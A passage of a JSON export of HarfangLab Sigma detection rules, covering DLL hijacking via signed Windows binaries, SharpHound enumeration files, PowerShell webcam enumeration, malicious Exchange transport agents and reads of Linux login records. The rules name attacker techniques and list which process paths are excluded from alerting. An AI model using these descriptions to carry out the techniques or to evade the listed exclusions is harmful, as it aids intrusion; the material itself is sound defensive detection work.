'?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8756b4ce-2c2d-458c-9663-402ab0d945d9",
"rule_name": "DLL Hijacking via netbtugc.exe",
"rule_description": "Detects potential Windows DLL Hijacking via netbtugc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8780eb74-cf3c-4641-bf62-2597cf3cae7c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085282Z",
"creation_date": "2026-03-23T11:45:34.085284Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085288Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/22/d/an-investigation-of-the-blackcat-ransomware.html",
"https://attack.mitre.org/techniques/T1560/",
"https://attack.mitre.org/software/S0521/"
],
"name": "t1560_bloodhound_file_creation.yml",
"content": "title: SharpHound Domain Enumeration File Created\nid: 8780eb74-cf3c-4641-bf62-2597cf3cae7c\ndescription: |\n Detects files with SharpHound default nomenclature being written to disk.\n These files can either be .json files containing information about Active Directory objects or a zip file containing them.\n SharpHound is known to be used by attackers during the discovery phase to enumerate domains and find privilege escalation paths. Typically, SharpHound will be executed via a .ps1 or .exe file.\n It is recommended to determine if this action comes from internal tests and to look for other suspicious actions on the host.\nreferences:\n - https://www.trendmicro.com/en_us/research/22/d/an-investigation-of-the-blackcat-ransomware.html\n - https://attack.mitre.org/techniques/T1560/\n - https://attack.mitre.org/software/S0521/\ndate: 2023/06/13\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560\n - classification.Windows.Source.Filesystem\n - classification.Windows.HackTool.SharpHound\n - classification.Windows.Behavior.ActiveDirectory\n - classification.Windows.Behavior.Discovery\n - classification.Windows.Behavior.Collection\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith:\n - '\\20???????????_BloodHound.zip'\n - '\\20???????????_computers.json'\n - '\\20???????????_domains.json'\n - '\\20???????????_users.json'\n - '\\20???????????_gpos.json'\n - '\\20???????????_ous.json'\n - '\\20????????????_BloodHound.zip'\n - '\\20????????????_computers.json'\n - '\\20????????????_domains.json'\n - '\\20????????????_users.json'\n - '\\20????????????_gpos.json'\n - '\\20????????????_ous.json'\n\n exclusion_explorer:\n Image: '?:\\Windows\\explorer.exe'\n ProcessSignature : 'Microsoft Windows'\n ProcessSigned: 'true'\n\n condition: selection and not 1 of exclusion_*\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8780eb74-cf3c-4641-bf62-2597cf3cae7c",
"rule_name": "SharpHound Domain Enumeration File Created",
"rule_description": "Detects files with SharpHound default nomenclature being written to disk.\nThese files can either be .json files containing information about Active Directory objects or a zip file containing them.\nSharpHound is known to be used by attackers during the discovery phase to enumerate domains and find privilege escalation paths. Typically, SharpHound will be executed via a .ps1 or .exe file.\nIt is recommended to determine if this action comes from internal tests and to look for other suspicious actions on the host.\n",
"rule_creation_date": "2023-06-13",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1560"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "878a5509-175f-4fe1-977c-3f21e842a9bb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098536Z",
"creation_date": "2026-03-23T11:45:34.098538Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098542Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dataexchangehost.yml",
"content": "title: DLL Hijacking via dataexchangehost.exe\nid: 878a5509-175f-4fe1-977c-3f21e842a9bb\ndescription: |\n Detects potential Windows DLL Hijacking via dataexchangehost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dataexchangehost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\d2d1.dll'\n - '\\d3d11.dll'\n - '\\dcomp.dll'\n - '\\DWrite.dll'\n - '\\dxgi.dll'\n - '\\twinapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "878a5509-175f-4fe1-977c-3f21e842a9bb",
"rule_name": "DLL Hijacking via dataexchangehost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dataexchangehost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "87b85835-9289-4adc-bac4-c9cea4811f93",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083243Z",
"creation_date": "2026-03-23T11:45:34.083246Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083250Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/cb79101125064af2721b8346628db114999e4dfa/atomics/T1592.001/T1592.001.md",
"https://www.mandiant.com/resources/blog/analyzing-dark-crystal-rat-backdoor",
"https://attack.mitre.org/techniques/T1592/001/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1592_001_enumerate_plugnplay_webcams.yml",
"content": "title: PnP Webcams Enumerated via PowerShell\nid: 87b85835-9289-4adc-bac4-c9cea4811f93\ndescription: |\n Detects execution of PowerShell command related to enumerate plug and play webcams.\n Attackers may use it during the discovery phase.\n This technique was seen in dcrat malware backdoor capabilities where it enumerates the camera info mounted on the compromised host.\n It is recommended to investigate the process responsible for the script execution as well as its ancestors to look for malicious content or actions.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/cb79101125064af2721b8346628db114999e4dfa/atomics/T1592.001/T1592.001.md\n - https://www.mandiant.com/resources/blog/analyzing-dark-crystal-rat-backdoor\n - https://attack.mitre.org/techniques/T1592/001/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/12/23\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.reconnaissance\n - attack.discovery\n - attack.t1592.001\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Discovery\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n PowershellCommand|contains|all:\n - 'SELECT * FROM Win32_PnPEntity'\n - 'PNPClass'\n - 'Camera'\n\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "87b85835-9289-4adc-bac4-c9cea4811f93",
"rule_name": "PnP Webcams Enumerated via PowerShell",
"rule_description": "Detects execution of PowerShell command related to enumerate plug and play webcams.\nAttackers may use it during the discovery phase.\nThis technique was seen in dcrat malware backdoor capabilities where it enumerates the camera info mounted on the compromised host.\nIt is recommended to investigate the process responsible for the script execution as well as its ancestors to look for malicious content or actions.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1592.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "87d2cc4e-582f-4778-8944-25baff8859eb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071773Z",
"creation_date": "2026-03-23T11:45:34.071775Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071779Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf",
"https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook",
"https://attack.mitre.org/techniques/T1505/002/"
],
"name": "t1505_002_new_exchange_transport_agent_enabled_powershell.yml",
"content": "title: New Exchange TransportAgent Enabled via PowerShell\nid: 87d2cc4e-582f-4778-8944-25baff8859eb\ndescription: |\n Detects the enabling of a new TransportAgent on an Exchange server via PowerShell.\n Attackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\n The malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\n It is recommended to investigate the newly installed transport agent for malicious content.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf\n - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook\n - https://attack.mitre.org/techniques/T1505/002/\ndate: 2022/11/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.002\n - attack.command_and_control\n - attack.t1104\n - attack.t1071.003\n - attack.defense_evasion\n - attack.t1546.008\n - attack.collection\n - attack.t1114.002\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.Collection\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains: 'Enable-TransportAgent '\n\n exclusion_exchange_setup:\n ProcessOriginalFileName: 'ExSetupUI.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\program files\\'\n - '?:\\program files (x86)\\'\n\n exclusion_dkimsigner:\n ProcessImage|endswith: '\\configuration.dkimsigner.exe'\n ProcessDescription: 'DKIM Signing Configuration'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "87d2cc4e-582f-4778-8944-25baff8859eb",
"rule_name": "New Exchange TransportAgent Enabled via PowerShell",
"rule_description": "Detects the enabling of a new TransportAgent on an Exchange server via PowerShell.\nAttackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\nThe malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\nIt is recommended to investigate the newly installed transport agent for malicious content.\n",
"rule_creation_date": "2022-11-08",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1071.003",
"attack.t1104",
"attack.t1114.002",
"attack.t1505.002",
"attack.t1546.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "87d7c639-91d6-4395-a982-e2f01a0e9a71",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.564095Z",
"creation_date": "2026-03-23T11:45:34.622074Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622079Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1033/",
"https://attack.mitre.org/techniques/T1087/001/"
],
"name": "t1033_login_records_read_linux.yml",
"content": "title: Suspicious Read of Login Records\nid: 87d7c639-91d6-4395-a982-e2f01a0e9a71\ndescription: |\n Detects a suspicious attempt to read any of the login records: /var/run/utmp, /var/log/wtmp or /var/log/btmp.\n Attackers may use it during discovery phase to retrieving information about the running system.\n - /var/run/utmp maintains a full accounting of the current status of the system, system boot time, user logins, logouts, system events etc;\n - /var/log/wtmp acts as a historical utmp;\n - /var/log/btmp records failed login attempts.\n These files are in a binary format and are usually accessed using specific commands but attackers can try and read them directly.\n It is recommended to investigate the process performing this action to determine its legitimacy and look for other suspicious activities related to this process.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\n - https://attack.mitre.org/techniques/T1087/001/\ndate: 2023/12/15\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - attack.t1087.001\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Kind: 'access'\n Permissions: 'read'\n Path:\n - '/var/run/utmp'\n - '/var/log/wtmp'\n - '/var/log/btmp'\n ProcessImage|contains: '?'\n ProcessParentImage|contains: '?'\n\n filter_system_bin:\n ProcessImage:\n - '/usr/bin/last'\n - '/usr/bin/lastlog'\n - '/usr/bin/systemd-tmpfiles'\n - '/bin/login'\n - '/usr/bin/login'\n - '/bin/su'\n - '/usr/bin/su'\n - '/usr/bin/logrotate'\n - '/usr/sbin/logrotate'\n - '/usr/bin/lslogins'\n - '/bin/systemd-tmpfiles'\n - '/usr/bin/lsattr'\n\n exclusion_common:\n ProcessImage:\n - '/usr/bin/tail'\n - '/usr/bin/file'\n - '/bin/grep'\n - '/usr/bin/grep'\n - '/usr/bin/ac'\n - '/usr/bin/rsync'\n - '/bin/tar'\n - '/usr/bin/tar'\n - '/usr/sbin/crond' # /usr/sbin/crond -n\n - '/lib/systemd/systemd-update-utmp'\n - '/usr/lib/systemd/systemd-update-utmp'\n - '/usr/lib/systemd/systemd-readahead'\n - '/usr/bin/clamscan'\n - '/usr/sbin/clamd'\n - '/usr/libexec/cockpit-session'\n - '/usr/lib/cockpit/cockpit-session'\n - '/usr/sbin/lightdm'\n - '/usr/libexec/gdm-session-worker'\n - '/usr/lib/accounts-daemon'\n - '/usr/libexec/accounts-daemon'\n - '/usr/lib/accountsservice/accounts-daemon'\n - '/nix/store/*-accountsservice-*/libexec/accounts-daemon'\n - '/usr/sbin/vsep'\n - '/usr/bin/mksquashfs'\n - '/usr/bin/syft'\n - '/usr/lib/openssh/sshd-session'\n - '/usr/bin/rg'\n - '/usr/bin/gzip'\n - '/usr/sbin/agetty'\n - '/usr/bin/lightdm'\n - '/usr/bin/nautilus'\n\n exclusion_ssh:\n ProcessImage:\n - '/usr/sbin/sshd'\n - '/usr/local/libexec/sshd-session'\n - '/usr/libexec/openssh/sshd-session'\n\n exclusion_auditbeat:\n ProcessImage: '/usr/share/auditbeat/bin/auditbeat'\n\n exclusion_tina:\n ProcessCommandLine|startswith:\n - '/tina/timenavigator/tina/bin/'\n - '/usr/tina/timenavigator/tina/bin/'\n\n exclusion_bacula:\n ProcessImage:\n - '/usr/sbin/bacula-fd'\n - '/opt/bacula/bin/bacula-fd'\n\n exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - '/opt/f-secure/fsbg/bin/'\n - '/opt/f-secure/atlant/fsbg/bin/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n\n exclusion_wazuh:\n - ProcessParentImage: '/var/ossec/bin/wazuh-logcollector'\n - ProcessGrandparentImage: '/var/ossec/bin/wazuh-logcollector'\n\n exclusion_aide:\n ProcessImage: '/usr/bin/aide'\n\n exclusion_chkrootkit:\n ProcessImage:\n - '/usr/lib/chkrootkit/chklastlog'\n - '/usr/lib/chkrootkit/chkwtmp'\n\n exclusion_lacework_datacollector:\n # /var/lib/lacework/6.11.0.21858/datacollector\n # /var/lib/lacework/6.7.6.19823/datacollector\n ProcessImage: '/var/lib/lacework/*/datacollector'\n\n exclusion_docker:\n - ProcessImage: '/usr/bin/dockerd'\n - ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/runc|/usr/bin/dockerd|'\n\n exclusion_bmc:\n ProcessAncestors|contains: '|/opt/bmc/bladelogic/RSCD/bin/rscd_full|'\n\n exclusion_deja-dup:\n ProcessAncestors|startswith: '/usr/bin/deja-dup|'\n\n exclusion_networker:\n ProcessAncestors|startswith: '/usr/sbin/nsrexecd|'\n\n exclusion_image:\n ProcessImage:\n - '/opt/landesk/bin/plugin'\n - '/opt/sentinelone/bin/sentinelone-agent'\n - '/opt/eset/efs/lib/oaeventd'\n - '/opt/eset/efs/lib/odfeeder'\n - '/opt/bitdefender-security-tools/bin/bdsecd'\n - '/usr/local/bin/restic'\n - '/opt/ds_agent/ds_am'\n - '/opt/cybereason/sensor/bin/cbram'\n - '/usr/bin/proxmox-backup-client'\n - '/opt/microsoft/mdatp/sbin/wdavdaemon'\n - '/opt/endpoint-agent/agent' # sekoia agent\n - '/opt/nagiosagent/*/perl/bin/perl'\n - '/opt/McAfee/ens/tp/bin/mfetpd'\n - '/opt/traps/bin/pmd'\n - '/kaniko/executor'\n - '/opt/altiris/notification/nsagent/bin/aex-pluginmanager.bin'\n - '/opt/Elastic/Agent/data/elastic-agent-*/components/osqueryd'\n - '/opt/eGambit/das/dasc'\n - '/usr/Atempo/TimeNavigator/tina/Bin/*'\n - '/usr/local/Atempo/TimeNavigator/tina/Bin/*'\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/usr/local/avamar/bin/avtar.bin'\n - '/opt/sophos-av/engine/_/savscand.?'\n - '/usr/openv/netbackup/bin/bpbkar'\n - '/opt/omni/lbin/vbda'\n - '/opt/dynatrace/oneagent/agent/lib64/oneagentos'\n - '/opt/tivoli/tsm/client/ba/bin/dsmc'\n - '/usr/local/sbin/proxmox-backup-client'\n - '/opt/forticlient/epctrl'\n - '/opt/forticlient/scanunit'\n - '/opt/NAI/LinuxShield/libexec/nailsd'\n - '/opt/f-secure/fsbg/bin/statusd'\n - '/opt/Tanium/TaniumClient/TaniumCX'\n - '/var/lib/rancher/k3s/data/*/bin/k3s'\n - '/opt/CrowdStrike/falcon-sensor*'\n - '/opt/Atempo/HN/bin/HNagent'\n - '/opt/Druva/EnterpriseWorkloads/bin/PhoenixFSDtBackupAgent'\n - '/usr/NX/bin/nxexec'\n - '/opt/splunkforwarder/bin/splunkd'\n - '/var/opt/kaspersky/kesl/*/opt/kaspersky/kesl/libexec/kesl'\n - '/usr/local/bin/filebrowser'\n - '/opt/dynatrace/agent/lib64/oneagentos'\n - '/opt/forticlient/webfilter'\n - '/usr/sbin/cbdaemon'\n - '/opt/a5000/infra/utd/*' # Mitel\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n exclusion_cron:\n ProcessAncestors|contains: '|/usr/sbin/crond|'\n\n exclusion_grafana:\n ProcessImage: '/usr/bin/alloy'\n\n exclusion_jumpcloud:\n ProcessParentImage: '/opt/jc/bin/jumpcloud-agent'\n\n exclusion_trendmicro:\n ProcessCommandLine|startswith: '/opt/ds_agent/ds_am '\n\n exclusion_borg:\n ProcessCommandLine|startswith: '/usr/bin/python* /usr/bin/borg '\n\n exclusion_pacemaker:\n ProcessAncestors|contains: '|/usr/sbin/pacemakerd|'\n\n exclusion_dolphin:\n ProcessImage|endswith: '/kioworker'\n ProcessParentImage: '/usr/bin/dolphin'\n\n exclusion_restic:\n ProcessCommandLine|contains: '/bin/restic backup '\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "87d7c639-91d6-4395-a982-e2f01a0e9a71",
"rule_name": "Suspicious Read of Login Records",
"rule_description": "Detects a suspicious attempt to read any of the login records: /var/run/utmp, /var/log/wtmp or /var/log/btmp.\nAttackers may use it during discovery phase to retrieving information about the running system.\n - /var/run/utmp maintains a full accounting of the current status of the system, system boot time, user logins, logouts, system events etc;\n - /var/log/wtmp acts as a historical utmp;\n - /var/log/btmp records failed login attempts.\nThese files are in a binary format and are usually accessed using specific commands but attackers can try and read them directly.\nIt is recommended to investigate the process performing this action to determine its legitimacy and look for other suspicious activities related to this process.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "87f583d1-ca80-4cc4-bd29-8bb2d2fced2f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073122Z",
"creation_date": "2026-03-23T11:45:34.073124Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073129Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/",
"https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmic",
"https://attack.mitre.org/techniques/T1047/",
"https://attack.mitre.org/techniques/T1021/006/"
],
"name": "t1021_006_wmi_process_call.yml",
